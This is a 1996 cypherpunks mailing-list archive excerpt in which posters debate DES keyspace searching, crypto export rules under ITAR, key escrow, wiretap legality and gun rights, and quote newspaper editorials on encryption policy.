I'd find you no more objectionable than the Tibetan Buddhists (whom
I actually hold in rather high regard, although they're never going
to convert me either!)

-jcr

PS:  I do think it's a Good Thing that mormons don't pay the clergy.
One positive for LDS.  Did you pick up that idea from the Ba'ha'i?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Fri, 4 Oct 1996 19:08:48 +0800
To: Jeff Ubois <jubois@netcom.com>
Subject: Re: paging nets
Message-ID: <3.0b15.32.19961004124320.006b0320@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain



>BBC Blows Radiopager Security Systems Wide Open
>LONDON, ENGLAND, 1996 OCT 2 (NB) -- By Steve Gold. 

Now, why does he sound familiar :)

Regards,

Mark
Mark Neely - accessnt@ozemail.com.au
Lawyer, Internet Consultant, Professional Cynic & Author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 5 Oct 1996 08:44:32 +0800
To: bkmarsh@feist.com (Bruce M.)
Subject: Re: Can we kill single DES?
In-Reply-To: <Pine.BSI.3.91.961004091150.24933A-100000@wichita.fn.net>
Message-ID: <199610041744.MAA05403@homeport.org>
MIME-Version: 1.0
Content-Type: text


DB only has 64 Pentiums.  There are lots of small businesses with more
compute power.  Much more useful to sell IBM on the idea of a
Christmas Tree screen saver. :)

Adam

Bruce M. wrote:

| > A Linux port (Pentium) would be *very* good - lots of Linux people tend to by
| > pro-cpunk.  Ditto for OS/2.   And who knows, if you hyped the business
| > aspects enough you might even find IBM or some other large corp willing to
| > donate some time on large system.
| 
|     Maybe Deep Blue gets bored in between its chess matches. :)



-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Sat, 5 Oct 1996 05:51:17 +0800
To: "geeman@best.com>
Subject: Re: DESCrack keyspace partitioning
In-Reply-To: <01BBB1D1.968E25C0@geeman.vip.best.com>
Message-ID: <325550B5.7CCD@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


geeman@best.com wrote:
> 
> Another thinking step: most real-world DES keys are derived from 
> hashes. Not (P)RNGs.

Hashes?  Hashes of what?

> The distributions are **not** uniform.

Then that's a wonderful weakness in the cryptosystem.  Let's fix it.

> The goal is to search the most likely keys first, and
> not all keys are created equally.

Any cryptosystem for which one can compute likely vs. unlikely keys
has already been partially compromised.

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 5 Oct 1996 07:05:41 +0800
To: cypherpunks@toad.com
Subject: legality of wiretapping: a "key" distinction
Message-ID: <199610042004.NAA27789@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



reponses to my last post were very illuminating and
interesting, and one key point by someone-or-other
caught my attention.

he made the distinction of "search and seizure" made with
the knowledge of the person involved, and "search and
seizure" such as wiretapping done without the knowledge
of the person surveilled.

if one were to try to say that wiretapping was unconstitutional,
it seems one would have to define why it is an *unreasonable*
kind of search and seizure. and this distinction might be a
great, prime candidate: because the participant is *unaware*
of the "seizure," there is too great a potential for abuse.

it seems to me many people's fears here boil down to this
fear of the government surveilling them without their knowledge,
of them being denied the right to choose to be in contempt of
court and reject handing over information when presented with
a warrant/subpoena. (is this a right? is it being broken by surreptitious
surveillance?)

==

I am really amazed that there isn't much case law on wiretaps, which
have been around a long time. at least it is rarely quoted here.
what exactly is a legal wiretap? has anyone challenged the fundamental
authority of the government in making wiretaps in which subjects
are unaware of the metaphorical "search and seizure" going on?

recent Bernstein and Junger cases are going to be fantastic milestones
in our legal system for challenging the cryptographic status quo.
I wonder if cpunks might be interested in challenging the 
wiretap status quo!! it would seem like the first logical step.

the FBI has often said they don't want to expand their powers in 
wiretapping areas. but are those powers they have right now legitimate?
if they are not, as many here seem to argue, 
then they ought to be challenged in court ala the one-man-guerilla
attacks like Bernstein and Junger. (any takers? <g>)

anyway, I propose that cpunks try to collect all the minutia in the
case law about wiretaps and try to make the case that wiretapping
that the FBI has enjoyed is itself not legitimate, and therefore
any extension of it (such as Clipper) is also illegitimate.

==

more and more I wonder if this is one of the key differences between
libertarian and spook bureacrat's views on GAK, key escrow, key
recovery (let us put it all under the heading "key access"). the
spooks seem to emphasize that they should be able to get access
to communications without giving anyone the opportunity to refuse
or possibly even know about such access. libertarians seem to
insist that this is a violation of privacy and due process etc.

I think there may be a legitimate argument here that might have
legal merit that a reasonable "search and seizure" ought to
involve the knowledge of the participant, and that unreasonable
searches and seizures often do not. hence, wiretapping without
suspect agreement may be illegal? (in all the other ways that
evidence is obtained through warrants/subpoenas, one needs
the cooperation of the suspect?)  obviously the government would
argue that the cooperation of the suspect is irrelevant and
impossible. what exactly does it mean to "present a warrant"
or subpoena? is there a right to refuse such a subpoena similar
to the way one is guaranteed freedom from self-incrimination?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 5 Oct 1996 01:40:44 +0800
To: cypherpunks@toad.com
Subject: NYT Nix GAK
Message-ID: <199610041312.NAA20299@pipe2.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, October 4, 1996, p. A32. 
 
 
   A Flawed Encryption Policy [Editorial] 
 
 
   The new White House proposal to keep high-powered 
   encryption software out of the hands of foreign terrorists 
   and criminals is needlessly restrictive and probably 
   unworkable. Though the new plan is better than previous 
   Administration proposals, it risks doing more harm than 
   good. 
 
   The Administration is rightly worried that foreign 
   terrorists or criminals will get hold of encryption 
   software that will make it impossible for the Government to 
   eavesdrop on their telephone and computer messages. The 
   technology is legal in this country, but the Administration 
   wants to keep the powerful new software out of foreign 
   hands. 
 
   However, the Administration downplays the fact that 
   encryption is also a good way for honest citizens to 
   prevent crime. At a time when banks and other private 
   companies send vast amounts of confidential information 
   over the electronic highway, it would seem sensible to make 
   high-quality encryption widely available so that the 
   private sector can protect itself from criminal or 
   malicious eavesdropping. For that reason, the Government 
   ought to promote wide-scale dissemination of encryption, 
   both here and abroad. 
 
   Trying to block dissemination is probably useless and 
   almost certainly harmful to American exports. Powerful 
   encryption systems made by foreign companies are already 
   available in Europe and Asia, and American exporters will 
   need to sell state-of-the-art software to keep competitive. 
 
   The Clinton Administration previously proposed that the 
   computer industry adopt a single type of encryption, known 
   as key-escrow, which would scramble messages with 
   mathematical passwords. Under the plan, private companies 
   and individuals would turn over these passwords to the 
   Government, which, with court authorization, could use them 
   to unscramble the phone and computer traffic. The purpose 
   of key-escrow, then, would be to preserve the Government's 
   existing ability to tap phone calls. 
 
   But that Clinton plan was firmly rejected by industry and 
   privacy-rights advocates who feared that a government that 
   held passwords would abuse First Amendment prohibitions 
   against listening in on private communications. The latest 
   White House plan addresses many of these concerns. It would 
   impose restrictions only on the software that exporters 
   sell abroad. Privacy advocates have less to fear from the 
   latest plan because it would allow individuals to deposit 
   their passwords with private organizations, rather than the 
   Government. 
 
   Yet the Administration has not explained why foreigners 
   would buy American software that would allow the F.B.I. to 
   eavesdrop when they could buy equally powerful software 
   from non-American manufacturers that omits any such trap 
   door. Critics assume that foreign governments -- few of 
   which pay attention to American constitutional protections 
   against invasion of privacy -- would demand access to 
   passwords, making such software unattractive for anyone to 
   use. 
 
   There is room to improve the plan. A panel of the National 
   Research Council recently concluded that there is no good 
   reason to restrict exports of currently available 
   encryption because foreigners already have access to 
   equally powerful software. There is time to work out 
   restrictions, in cooperation with the industry and privacy 
   advocates, for the next generation of encryption software. 
   In the meantime the Administration might push forward on 
   the panel's other sensible recommendations -- such as 
   developing better encryption expertise within the F.B.I. 
   and helping the private sector develop the encryption 
   software it needs to stop illegal eavesdropping. 
 
   [End] 
 
   The National Research Council report is available at: 
 
   http://pwp.usa.pipeline.com/~jya/nrcindex.htm 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 5 Oct 1996 07:11:25 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: DESCrack keyspace partitioning
In-Reply-To: <325501C5.167EB0E7@systemics.com>
Message-ID: <199610042021.NAA29619@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


of course, any number in the range of a random number
generator is theoretically as likely/unlikely to appear.

however, consider the case in which DES keys are generated
from ascii sequences or words that people enter in at
password prompts, which is in fact how the unix passwd file
word. these obviously have far less randomness
and Gary's attempt to narrow the keyspace is highly 
relevant.

also, I took his post as suggesting that some parts of the
keyspace ought to be searched at higher priority than
others. in the above example, keys that correspond to 
ascii sequences typable on a keyboard should be searched
first in the keyspace.

a lot of systems use DES only in conjuction with a one-time-key
generated for a particular message. (similar to the way
PGP uses IDEA for the session key, and transmits this encoded
key using RSA). in general I would say these could be considered
random in a way that the previous "less-than-random" property
doesn't hold.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Sat, 5 Oct 1996 07:02:17 +0800
To: dc-stuff@dis.org
Subject: Speaker Wanted
Message-ID: <Pine.BSI.3.91.961004132916.24641F-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



I need someone who can give a speech on Contingency Disaster Planning 
from November 4-6 in Northern California to the computer security group 
at NASA AMES. Female speakers are encouraged as well.

All expenses would be paid as well as a speaker fee for each individual 
day. While this is a *one time* event, it may be possible that it would 
lead to other engagements on a periodic basis both across the US, and 
infrequently in Japan and Europe.

Email me if interested or if you need more information.

se7en




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 5 Oct 1996 09:09:05 +0800
To: The Deviant <unicorn@schloss.li>
Subject: Re: Fw: Re: ITAR satellite provision
Message-ID: <199610042101.OAA08867@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:09 PM 10/4/96 +0000, The Deviant wrote:
>On Thu, 3 Oct 1996, Black Unicorn wrote:
>[...]
>> "A launch vehicle or payload shall not, by reason of the launching of such
>> vehicle, be considered an export for purposes of this subchapter."
>> 
>> Focus on "by reason of launching of such vehicle,"
>> 
>> Launching a vehicle alone is not export.  It takes more than launch to
>> make it an export.  More than the launching is not much.
>[...]
>> --
>> I hate lightning - finger for public key - Vote Monarchist
>> unicorn@schloss.li
>> 
>
>So.. if I were to take PGP, put it on a floppy disk, tape it to a model
>rocket, and launch it across the mexican border, that's not exporting it
>(although the FAA might complain)?


That's _my_ interpretation.  I look at it this way:  Missile launches can 

1.  Return to the country of origin.
2.  Splash down in International waters.
3.  land on foreign soil.
4.  Orbit for awhile and land "somewhere."
5.  Orbit essentially forever.
6.  Go somewhere in space other than an earth orbit.

All this stuff is obvious to the people who wrote the regulation. In 
addition, it is not necessarily certain which of these outcomes will occur 
in any given launch.   The terminology in the rule above does not 
distinguish any of these outcomes.  In the absense of further clarification, 
it is logical to conclude that which particular route the missile 
subsequently takes is irrelevant to the applicability of the exception.

This is particularly true, since the writers of that regulation were free to 
add clarification should they have chosen to do so.  Further, that they 
DIDN'T "clarify" is logical, because if the outcome of any given missile may 
be uncertain, and assuming that this regulation was written as a 
mutual-suck-up maneuver between government and industry, it is reasonable to 
assume that the regulation would be interpretated to immunize the launcher 
regardless of the launch's outcome.  One can reasonably suppose that 
Rockwell wouldn't want to be declared in violation of ITAR simply because 
the second stage of a rocket failed and dropped a crypto-carrying satellite 
onto China.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Sat, 5 Oct 1996 09:56:40 +0800
To: cypherpunks@toad.com
Subject: [COMMENT][GAK] "GAK from KRAP"
Message-ID: <199610042113.OAA08487@well.com>
MIME-Version: 1.0
Content-Type: text/plain



1) Thanks to Phil Zimmerman the world already has "Pretty Good
   Privacy."

2) Only an idiot, much less one of the 4 Horsemen would get caught
   using GAK from KRAP.

3) As the FOIA obtained documents from the Clipper I era indicated,
   the gubmint knows the only way to make this work is to ban other
   forms of encryption.

4) That and that alone would be "The Shot Heard 'Round the Net."

Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 5 Oct 1996 08:17:36 +0800
To: snajdr@pvt.net (Petr Snajdr)
Subject: Re: WINDOWS NT ????
In-Reply-To: <325488A8.4F27BCF7@pvt.net>
Message-ID: <199610041914.OAA00187@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> pclow wrote:
> > Adamsc wrote:
> > > > is Windows NT secured system ?
> > NT? Secured? hahahahahahahahahahahahahahahahhahahahahahahaha
>                         8-)
> How ? 

     By turning off the machine, unpluging the ethernet, moving the
hard drive to another state...


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petr Snajdr <snajdr@pvt.net>
Date: Fri, 4 Oct 1996 23:52:59 +0800
To: pclow@pc.jaring.my
Subject: Re: WINDOWS NT ????
In-Reply-To: <19961004024009156.AAA66@GIGANTE>
Message-ID: <325488A8.4F27BCF7@pvt.net>
MIME-Version: 1.0
Content-Type: text/plain


pclow wrote:
> 
> Adamsc wrote:
> > > is Windows NT secured system ?
> 
> NT? Secured? hahahahahahahahahahahahahahahahhahahahahahahaha

                        8-)

How ? 



--
S pozdravem
    Petr Snajdr
*--------------------------------------------------------------*
| "640K should be enough for anybody." - Bill Gates            |
|                                                              |
| "OS/2 is destined to be a very important piece of software.  |
| During the next 10 years, millions of programmers and users  |
| will utilize this system." - Bill Gates (Again)              |
*--------------------------------------------------------------*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 5 Oct 1996 00:00:12 +0800
To: "geeman@best.com>
Subject: Re: DESCrack keyspace partitioning
In-Reply-To: <01BBB163.FC317940@geeman.vip.best.com>
Message-ID: <325501C5.167EB0E7@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


geeman@best.com wrote:
> 
> What about the heuristics of partitioning the keyspace?
> 
> Seems to me that a _subset_ of all possible keys is much more likely
> to appear than a random selection from an equidistributed population 0..2^56.
> 
> (P)RNG's just aren't that likely to produce a key of 010101010.....
> nor 001100110011...

Why?  They seem just as likely as any other sequence.

 etc etc and I have been thinking about how one might formalize
> and exploit this randomness property to increase the probability of finding the key sooner.

Again, which randomness property?


Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 5 Oct 1996 10:08:22 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: MacGAK: Tim has a snit. Again.
Message-ID: <199610042132.OAA11336@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:30 AM 10/4/96 -0400, Robert Hettinga wrote:

>It's interesting to note that the only person who is supposed to be in your
>killfile is Perry Metzger, even though you respond to him anyway,
>especially when he says something which offends your vanity. So, such a
>killfiling claim is probably dubious.  Since such luminaries as VZNuri, Dr.
>Vulis, and Jim Bell are *not* in your killfile, evidenced by your
>voluminous replies to them,

Aw, C'mon Bob!  I resent being placed in the same short list as Nuri and 
Vulis.  While some people may consider my ideas to be similarly wacky, I try 
to not be NEARLY as rude as those other guys (singular?).



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Sat, 5 Oct 1996 07:03:30 +0800
To: cypherpunks@toad.com
Subject: Re: DESCrack keyspace partitioning
In-Reply-To: <01BBB163.FC317940@geeman.vip.best.com>
Message-ID: <Pine.3.89.9610041356.B3645-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, geeman@best.com wrote:


> Seems to me that a _subset_ of all possible keys is much more likely
> to appear than a random selection from an equidistributed population 0..2^56.

This is a contradiction.  Unless you were defining "subset" using a 
specific weakness in a specific RNG, in which case your argument would 
have been a tautology, saying nothing.

> (P)RNG's just aren't that likely to produce a key of 010101010.....
> nor 001100110011... etc etc and I have been thinking about how one might formalize 
> and exploit this randomness property to increase the probability of finding the key sooner.

RNG's are written to maximize randomness of of the numerical _value_ of 
the integer, independent of any arbitrary radix, including 
binary.

The "property" you describe is imaginary.  Like the Gambler's Fallacy, 
it's an artifact of our own cognitive functioning, and does not exist in 
the real world.

. . .
The radix is 13.
The answer is 42.
The question is "What do you get when you multiply 6 by 9?"

Let any search begin with self-knowledge...    Douglas B. Renner







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sat, 5 Oct 1996 09:11:27 +0800
To: cypherpunks@toad.com
Subject: Re: Export laws don't just affect crypto
In-Reply-To: <Pine.3.89.9610010807.A12171-0100000@netcom9>
Message-ID: <53407h$5gn@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199610011632.MAA01864@jekyll.piermont.com>,
Perry E. Metzger <perry@piermont.com> wrote:
>
>Lucky Green writes:
>> > Umm, so are you violating ITAR if you *use* these GPS-guided missiles
>> 
>> No you aren't. A little known provision in the ITAR excempts exports 
>> by missile. Seriously.
>
>Well, not quite -- it exempts exports by space launch, but I think
>thats intended for things like satelite launchings and not for things
>like missile attacks against other countries...
>
And I quote:

# (6) A launch vehicle or payload shall not, by reason of the launching of
# such vehicle, be considered an export for purposes of this subchapter.
# However, for certain limited purposes (see @ 126.1 of this subchapter),
# the controls of this subchapter may apply to any sale, transfer or
# proposal to sell or transfer defense articles or defense services.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlWELkZRiTErSPb1AQHn6QQAiylUndaqWbsVTScmyzn8dQlWS1vOx8tK
mBZlPlz0pvMY8jEi0pxT8PHsF2RI7vCi5yE4Z1PHAPDOUesrQiSZERzAlzRkxXgf
t2qn1ZSrlsgIEN50ttDoEu2geF74nakKeb4LtsTAmA7+dfceVZlu9v5sWfcoeAX/
utB5JYLMzz4=
=fbOv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Sat, 5 Oct 1996 10:35:52 +0800
To: cypherpunks@toad.com
Subject: Did HP get a sweetheart deal, too?
Message-ID: <199610042159.OAA17092@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


Ditto ...

I expect Apple and the rest of the "gang" to announce something soon.

Ern

-------- From: San Jose Mercury (Breaking News)

Hewlett-Packard wins $100 million NASA deals

PALO ALTO, Calif. (Reuter) - Hewlett-Packard Co. said Friday that it
won several contracts with a potential value of $100 million from the
National Aeronautics & Space Administration (NASA).

The contracts cover scientific and engineering workstation procurement
contracts for mechanical computer-aided design and geographic
information systems.

The contracts cover a four year period. Hewlett-Packard will provide
workstations, as well as peripherals, software, training and support
services.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.net>
Date: Sat, 5 Oct 1996 10:26:52 +0800
To: cypherpunks@toad.com
Subject: Re: (Firewalls) Where is that Snake Oil FAQ again?
Message-ID: <199610042214.PAA13751@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: adam@homeport.org, cypherpunks@toad.com
Date: Fri Oct 04 18:15:25 1996
This is the same company that made the claim earlier on this list to "break 
our code and own the company for $1".  It definately generated a lot of 
comments then, I think about six months ago.  They changed their name to 
IPG midway through the process.  This should be in the archives.  Sorry 
about the late response to this but I have been unavailable for the last 
four days working on a project and am just beginning to catch up on sleep 
and mail.

Lou Zirko


Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMlWamctPRTNbb5z9AQGoAggAngPrYPYCOp+53BZ3Ns0XJtsI6O/PqUzQ
sbxzpROa/blx9O3e1zIxbxPk1+aQcEwUXsnfFbDnciAjouaSnRzIfKG9XJ+cOy5y
XRaLzBgZ3lQr3fIp7mHv5n+nsdtrj8mdgmUxYXpO9q+MwTuGL54n12Qw23rJ4KMq
TSkBSgJWeqr7Mf1X2bI8ejaIbgImv9dCNFXIF+mUpKea2rarGej7lM1NOFd5FuyT
umaFeOcH05pcmC8sYmaabe5i9kmDXztCiGaCD3O101a7JoIh8GOCNjg7blo7q/lZ
rw77jyYpsI+3Ra67jWOMRK3p3WeBq9K8XqpP0b0Wo02R5nU1w5UnjQ==
=eT3d
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 5 Oct 1996 06:00:42 +0800
To: cypherpunks@toad.com
Subject: TWP: Tighten ITAR
Message-ID: <199610041518.PAA20690@pipe4.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, October 4, 1996, p. A22. 
 
 
   Crypto Politics [Editorial] 
 
 
   The Clinton administration once had a coherent, if 
   unpopular, position on encryption software, the stuff that 
   allows you to encode your email messages or other data so 
   that no one can read it en route without a key. Now, in the 
   wake of word that the president will sign an executive 
   order, the position is no longer coherent, nor discernibly 
   more popular with the high-tech audience it attempts to 
   mollify. 
 
   People and companies doing international financial business 
   are highly interested in this kind of software, the more 
   powerfully "uncrackable" the better. The U.S. software 
   industry thinks there's a lot of money in it, especially if 
   encryption becomes routine. 
 
   The administration position till recently was that, much as 
   U.S. software companies might profit from being able to 
   market "uncrackable" encryption software freely, national 
   security and law enforcement considerations dictated that 
   such exports be controlled by license. Powerful encryption, 
   like arms, could be dangerous in the hands of terrorists, 
   rogue governments or international criminals. The software 
   was classed as a munition; software above a certain 
   uncrackability level could not be exported unless law 
   enforcement authorities could get access somehow to the 
   "key" after obtaining the proper warrants. 
 
   Unbreakable codes on the loose strike us as a real danger, 
   a legitimate reason for tight export controls. But if the 
   administration really believes this, you'd think it would 
   stick with steps that can plausibly meet the goal of 
   control. 
 
   Instead, trying to please, it has been splitting and 
   splitting the difference between itself and the largely 
   unmoved industry, which argues that no one will buy an 
   encryption product that a government can decrypt at will. 
   As with arms sales, the companies also argue that if they 
   don't sell it, somebody else will, and that anyway it's far 
   too late to fence off rogues. The national security people 
   respond that there is still a "window," perhaps two years, 
   in which they can prevent, if not all leaks of unauthorized 
   crypto technology, at least its off-the-shelf use and wide 
   adoption as the international standard. 
 
   The administration initially proposed, then repeatedly 
   refined, the concept of key "escrow" -- depositing a copy 
   of the code with trusted third parties -- but never came up 
   with a version the industry would accept. It commissioned 
   a National Research Council report, which recommended a 
   significant easing of restrictions. Now the president 
   appears to have embraced a yet looser form of licensure 
   upon declaration by a company that it will develop a plan 
   within two years for key recovery. Also, the technology no 
   longer will be considered munitions. 
 
   What kind of plan? Nobody can quite say. What if the plans 
   aren't acceptable? Licensing will revert to the old rule in 
   two years. Will the security issue be moot by then? 
   Probably. Barring some burst of clarity, one is left 
   wondering whether the administration has compromised or 
   caved, and what it now believes about the dangers of 
   exporting uncrackable software. 
 
   [End] 
 
   Ditto, see the National Research Council report: 
 
   http://pwp.usa.pipeline.com/~jya/nrcindex.htm 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sat, 5 Oct 1996 10:52:22 +0800
To: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Subject: Re: The Right to Keep and Bear Crypto
Message-ID: <v02130500ae7ac982a9d8@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Why is it "disturbing" that for administrative convenience a regulation
>uses a shorthand term (in effect saying "treat crypto as if it was a
>munition"), but that the courts say whatever convenient shorthand you use
>for regulatory bookkeeping, it has no constitutional effect?
>
>What would be the advantage of having the government simply re-impose the
>ITAR word for word identically for all materials that are not arms in the
>constitutional sense?

I guess this is the crux of the matter.  I believe that most or all of
ITAR's munitions should be constitutionally as arms.

>
>As for your argument that the 2nd Am should be read expansively, rather
>than narrowly, personally I doubt strongly that the Framers would have
>been unanimous on this.

I doubt they were unanimous on most any issue.

>Recall that the Articles of Confederation were
>abandoned in part due to Shay's rebellion -- and the (majority)
>Federalists (of whom the Jefferson you quote WAS NOT a part)  managed to
>push through a strong centralizing government.

Yep, when they saw that some of the principles which help fuel the
Revolution could be used to oppose a new order they adopted some of the
same tactics and governmental view points of their former oppressors. The
original calls for strong states rights and a weak central authority were
swept away under Hamilton and early Supreme Court rulings.  In some sense,
the new government became just different clothing on the same old body.

>Recall that the
>constitution in its first draft didn't even have a bill of rights!  I am
>absolutely certain that the Framers recognized that things change over
>time, and that they would have intended indeed did intend for us to
>interpret the constitution with some degree -- but not too much --
>flexibility.  As someone who believes in the importance of fidelity to
>legal texts, I think we have a duty to make every word in the Constitution
>count.  I therefore place weight on the fact that the 2nd amendment is
>*unique* in giving the policy reason for the limitation on government
>power ("a well-regulated militia" being essential &tc.).  This is ample
>grounds to read the text as applying only in the context of an organized
>militia -- not casual gun ownership -- **whether or not** this complies
>with our best (and inevitably fallible) reconstruction of what certain
>historical individuals may have thought the text meant, especially if the
>historical evidence is mixed.

        [The Constitution preserves] the advantage of being armed which
        Americans possess over the people of almost every other nation
        [where] the governments are afraid to trust the people with arms.
                                  --James Madison
                                  The Federalist No. 46, 1787


>[PS. Why do you privilege the authors of the bill of rights over the
>people who voted for it?]

Many of the framers, their mentors (e.g., Machiavelli) and even
dyed-in-the-wool pacificists (e.g., Mahatma Gandhi) feared a central
authority which, after making arms unavailable to general population would
commence to tyranny.

If I did I appologize.  It was not intentional.
>
>I might add that I personally find all discussions of plots to kill
>people, or to watch gleefully while others seek to do so, so morally
>repulsive that I now killfile everyone who takes part in them.

I hope that includes all comuniques from our government's Executive branch
(although they almost never discuss these things publitically, with the
possible exception of our raid on Kadaffi).  How about the popular U.S.
consensus that the government aught to have killed Saddam?

Seems to me that some of the natural rights the people gave the government
need to be taken back (such as the perogative for personal actions
affecting those outside the U.S.)  Though I doubt that the government would
ever allow it. Why should the government call all the foreign policy shots
and have all the fun?  Especially when you see what a poor track record
they have.  Seems they should step aside for while and let some direct
democracy go to work for a change.

Thanks for your informative responses.  I don't expect a reply as you've
undoubtedly placed me in your kill file (as some other may have already).

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Santoyo, Felipe" <santoyof@petersenpub.com>
Date: Sat, 5 Oct 1996 13:21:20 +0800
To: cypherpunks@toad.com
Subject: Ignorance
Message-ID: <9609048444.AA844468635@petersenpub.com>
MIME-Version: 1.0
Content-Type: text/plain


     The topics inwhich are discussed here are interesting to say the 
     least, but I need to be brought up to speed. So if anyone could help 
     with this or suggest so good sources of information on this subject I 
     would more than appreciate it.
     
                                                Thanks!
     Feshnicad@petersenpub.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scottb@aca.ca
Date: Sat, 5 Oct 1996 06:40:40 +0800
To: <cypherpunks@toad.com>
Subject: picture encryption
Message-ID: <96Oct4.160134edt.15734@gateway.aca.ca>
MIME-Version: 1.0
Content-Type: text/plain



Sometime back someone mentioned a program that would hide messages inside a 
picture, by replacing the LSB of the color with the message.

Does anyone know where I can get this??

I was thinking that if they outlawed high strength encryption (non GAK 
approved), not letting them realize that you were sending encrypted 
information would be an excellent alternative.  Of course the message hidden 
in the image would be encrypted as well.  You could spend many months on 
trying to break the key, only to find out that it was really only a picture. 


/sb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Sat, 5 Oct 1996 13:14:12 +0800
To: "'cypherpunks@toad.com>
Subject: RE: DESCrack keyspace partitioning
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961004232217Z-1792@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


>geeman@best.com[SMTP:geeman@best.com] writes:
>Another thinking step: most real-world DES keys are derived from hashes.
>Not (P)RNGs.
>The distributions are **not** uniform.
Oh??
>I am talking about FAMILIES of predictable bit patterns in keys, not any
>specific pattern.
>I'm doing the stats.
[...snip...]

If you've discovered significant biases in MD5, or some other
crypto-strength hash, that could be exploited to speed a keyspace
search, that would be newsworthy indeed.  I'm skeptical, but please
share your results with us.  

[For context, Mike McNally wrote, in part]
>[...] a good
>32-bit CSPRNG has only a 1/2^32 chance of producing any particular
>bit pattern.  Of course, another way of saying that is that it's just
>as likely to get an "obvious" bit pattern as it is to get any other
>one.  You can't just throw away part of the keyspace based on such
>bogus reasoning.  (There may be other reasons to throw away part of
>the keyspace, of course.)

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================





